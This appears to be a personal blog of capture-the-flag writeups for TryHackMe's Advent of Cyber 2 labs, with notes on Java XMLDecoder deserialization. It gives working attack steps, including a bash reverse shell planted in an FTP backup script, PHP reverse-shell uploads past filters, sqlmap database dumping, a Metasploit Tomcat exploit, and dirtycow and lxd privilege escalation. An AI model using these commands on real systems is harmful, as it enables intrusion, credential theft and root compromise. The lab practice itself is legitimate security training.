TODO – XMLDecoder – CVE-2016-0792 – ObjectInputStream – CVE-2013-0156: Rails Object Injection – API to Shell

#web #pentesterlab #Serialize

XMLDecoder

Java's XMLDecoder can be used to unserliaize data. There are two common methods that can be used to perform code exec: * Runtime.exec() * ProcessBuilder

Steps to reproduce: 1. submit an expected file and check output. If XML check for class=.... If it's XMLDecoder you may be able to utilise the above. 2. Craft an XML file with actions you want the underlying Java runtime to perform.

References:

• https://find-sec-bugs.github.io/bugs.htm#XML_DECODER
• https://www.baeldung.com/run-shell-command-in-java

CVE-2016-0792

• This exploit relied on libraries within java applications that handled unexpected data badly and allowed code execution.
• The key here would have been to test requests to servers by throwing in some unexpected data and then observing the error messages. In this case, error messages would have shown that the command being embedded in the XML was being executed before the application errored out.
• Doing a simple ping or curl on a server you controlled would have shown that the exploit worked and could achieve remote communication.

Get started with Cyber Security in 25 Days – Learn the basics by doing a new, beginner friendly security challenge every day leading up to Christmas.

https://tryhackme.com/room/adventofcyber2

Here are my writeups! Happy Holidays folks 🎄

Day 1: #Web #Cookies A Christmas Crisis

• modify basic auth cookie to bypass authentication for user santa.
• cookie format is in hexadecimal which is presented as json when decoded.

Day 2: #Web #RCE The Elf Strikes Back

• login using provided ID via GET parameter.
• set up a simple php reverse shell
• bypass upload filter by adding .jpg before true extension.
• set up ncat listener: rlwrap ncat -lvnp $PORT
• visit upload directory and open uploaded php reverse shell.
• get www-data shell and get flag.

Day 3: #Web #Authentication Christmas Chaos

• attempt login and capture login URI.
• utilise burp cluster bomb with 2 payload sets for: username and password.
• run attack and compare response length to find correct credentials.
• login using these credentials for flag

Day 4: #Web #Fuzzing Santa's Watching

• scan for common directories —> find /api
• api file site-log.php used for querying site logs by date
• fuzz probable dates using wfuzz: wfuzz -c -z file,$WORDLIST -u $URI/api/site-log.php?date=FUZZ

Day 5: #Web #SQLi Someone stole Santa's gift list!

• bypass login using basic SQLi payload
• use info provided to launch sqlmap against the search parameter.
• burp –> capture request –> send to repeater –> save request.
• sqlmap -r $saved_request --tamper=space2comment --dump-all -dbms sqlite.
  • space2comment is a WAF bypass method. This can be identified via --identify-waf.
  • other WAF bypasses are available where needed.
• use db dumps to answer all questions.

Day 6: #Web #XSS Be careful with what you wish on a Christmas night

• web app is vulnerable to both reflected and stored XSS.
• OWASP ZAP can be used for automated scanning.
• The original compromise most likely utilised the stored XSS vulnerability and redirected a visitor to a malicious website upon clicking a certain hyperlink (by modifying <a> tags or by doing something like location.replace).

Day 7: #Networking #Wireshark The Grinch Really Did Steal Christmas

We're given 3 pcaps that need to be analysed.

pcap1

• find icmp traffic – type icmp in filter bar
• find all HTTP GET requests – http.request.method == GET
• find web pages visited (HTTP) by specific host – ip.src == 10.10.67.199 && http.request.method == GET

pcap 2

• find plaintext password in ftp traffic – ftp.request.command==PASS
• find encrypted protocol used – statistics > protocol hierarchy (from this we see SSH which is an encrypted protocol)

pcap 3

• recover files sent in the wire – file > export objects > http

Day 8: #Networking #nmap #enumeration What's Under the Christmas Tree?

A quick recap of nmap:

• -sT – TCP scan
• -sS – SYN scan – default
• -A – aggressive scan (includes OS, version, script and traceroute scans)
• --script vuln – scan for common vulnerabilities on open ports
  • additional scripts: enip-info, rdp-ntlm-info, http-enum
  • tip: you can use * as a wildcard when using --script.

Day 9: #Networking #ftp Anyone can be Santa!

• find anonymous ftp directories using nmap $IP -sV --script=ftp-anon
• ftp in and retrieve backup.sh
• set up reverse shell on local host: rlwrap ncat -lnvp 4242
• upload backup script back to the ftp server with an added bash reverse shell: sh -i >& /dev/udp/$THM_IP/4242 0>&1
• we should get a root shell on remote host this way.

Day 10: #Networking #smb Don't be sElfish!

enum4linux -U $IP – enumerate users on SMB server enum4linux -S $IP – enumerate shares on SMB server smbclient //$IP/$ShareName – connect to SMB share

Day 11: #Networking #privesc The Rogue Gnome

• we're given details to log in to ssh as the cmatic user.
• it appears to be a limited account without any sudo access, let's send over LinEnum.sh to automate enumeration for us.
• on the target machine: nc -l -p 1337 > /tmp/LinEnum.sh
• on the attacking machine: nc -w 3 $machineIP 1337 < LinEnum.sh
• The above should send the file from our machine to the target machine via nc (timeout -w at 3 secs)
• SUID enumeration reveals /bin/bash has SUID bit set
• With /bin/bash -p we get a root shell. The -p tells the shell to maintain the euid which in this case is 0 (root) due to SUID.

Day 12: #Networking #initialaccess Ready, Set, Elf

• nmap (-sC -sV)
• we see tomcat 9.0.17 being used
• searching that in exploit-db we find possible code exec CVEs

metasploit:

msfconsole
search CVE-2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
set lhost tun0
set rhost $remotehostIP
set URI $remotehostCGI
check
exploit
shell

the above gets us a user shell. Check privs with run post/windows/gather/win_privs

Day 13: #exploitation Coal for Christmas

• scan machine with nmap – notice telnet
• connect to telnet and log in with creds displayed
• Enumuration tips:
  • cat /etc/*release
  • cat /etc/issue
• Ubuntu 12.04 with kernel 3.2.0-23-generic – vulnerable to dirtyc0w.
• Transfer dirtyc0w source code to target machine and compile
• run and create a root privileged account!

Day 14: #osint Where's Rudolph?

• https://scylla.sh/ – neat place to find dehashed passwords.
• always check the entire post history of an account if possible.

Day 15 & 16: #python

#!/usr/bin/env python3
## TryHackMe Advent Calendar 2020 Day 16
## https://tryhackme.com/room/adventofcyber2

import requests

# The code below assumes an api endpoint with a odd-numbered key that we don't know the value of. The correct value will produce a flag.
# for loop to go over 1-100 key values, step by 2 to have odd numbers only

for api_key in range(1,100,2):
    # print what api key value we are iterating
    print(f"api_key {api_key}")
    # this is the api endoing we are sending requests to
    r = requests.get(f'http://EDITME_THMIP:8000/api/{api_key}')
    # only print text out if there are no failures or protections in place
    if "Error" not in str(r.text) and "PROTECTION" not in str(r.text):
        print(r.text)

Day 19: #SSRF #web The Naughty or Nice List

1. Observe that searches are proxied internally via http://list.hohoho:8080/search.php?name=.
2. Since an internal server is exposed, there are numerous things to do:
   • visit root of the host exposed e.g. http://list.hohoho:8080 via the URI parameter.
   • try different ports for enumeration.
   • check for any app side blocking/filtering e.g. visiting localhost via the proxy. If blocked, consider using localtest.me which resolves to 127.0.0.1 e.g. proxy=http://list.hohoho.localtest.me
   • this could lead to some sensitive exposure.

Day 17 & 18: #reversing #assembly #dotnet ReverseELFneering & The Bits of Christmas

Opening a binary with radare2 – r2 -d <file> Analysing a binary – aa List of functions – afl Print disassembly function – pdf @<function> Breakpoint – db <reference> Run program until breakpoint – dc View contents of memory address – px @<memory address> Move to next instruction – ds View %eax register – dr Reload program – ood

For DotNet applications, ILSpy and Dotpeek are good tools that can be used to decompile .NET applications and potentially view methods that contains information to bypass certain checks or authentication.

Day 20: #powershell PowershELlF to the rescue

Some intro to powershell and navigating the file and directory system:

Get-ChildItem -Path <> -File/-Directory -Hidden -ErrorAction SilentlyContinue The above would look for all items in a specified path that has either hidden files or folders and would not worry about any errors.

Measure-Object Can be piped to provide info on an object like words e.g. Get-Content file.txt | Measure-Object -Word

(Get-Content -Path file.txt)[index] Read something in a file at a specfic position. E.g. ...file.txt)[100] for the 99th character.

Select-String -Path ./Desktop -Pattern '*.txt' Find all txt files within the desktop. Can also be used to search for strings within a file.

Day 21: #forensics #powershell Time for some ELForensics

• ADFS is a part of NTFS and can contain alternate data streams not visible to the user. Calculate MD5: Get-FileHash -Algorithm MD5 <file> View streams: Get-Item -Path file.exe -Stream * Launch the stream/s found: wmic process call create $(Resolve-Path file.exe:streamname)

Day 22: #forensics Elf McEager becomes CyberElf

Data decoding via https://gchq.github.io/CyberChef/

Day 23: #forensics The Grinch strikes again!

• malicious scheduled tasks may often be utilised by ransomware operators.
• volume shadow copy service (VSS) creates “snapshots” of data. This can be interacted with using vssadmin
• for any hidden volumes, they may be able to have a drive path assigned to them and mounted. Checking for hidden files and folders is also advisable in that volume.

Day 24

Find hidden web directories and php pages:

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt

gobuster dir -u http://10.10.216.164:65000 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -x php

Visit the discovered file upload page and try to upload a reverse PHP shell. A simple file rename to .jpg.php doesn't work. See network connections and notice filter.js. Block this to circumvent the client side filter. Visit the file once shell is uploaded and reverse shell listener is set up.

rlwrap ncat -nlvp 1234

Upgrade shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

After finding the DB creds in the includes folder, connect to it using MySQL client.

$ msql -utron -p
$ show databases;
$ use tron;
$ show tables;
$ select * from users;

We find the user flynn's hashed password which can be cracked via crackstation. Using these credentials, SSH into localhost (or use su flynn). The flyn user is in the lxd group, allowing us to interact with linux containers (lxc).

$ lxc image list # see if there are any images we can use
$ lxc init $IMAGENAME $CONTAINERNAME -c security.privileged=true # create a new priv. container
$ lxc config device add $CONTAINERNAME $DEVICENAME disk source=/ path=/mnt/root recursive=true # add mounted device with path = root
$ lxc start $CONTAINERNAME
$ lxc exec $CONTAINERNAME /bin/sh # connect to the container shell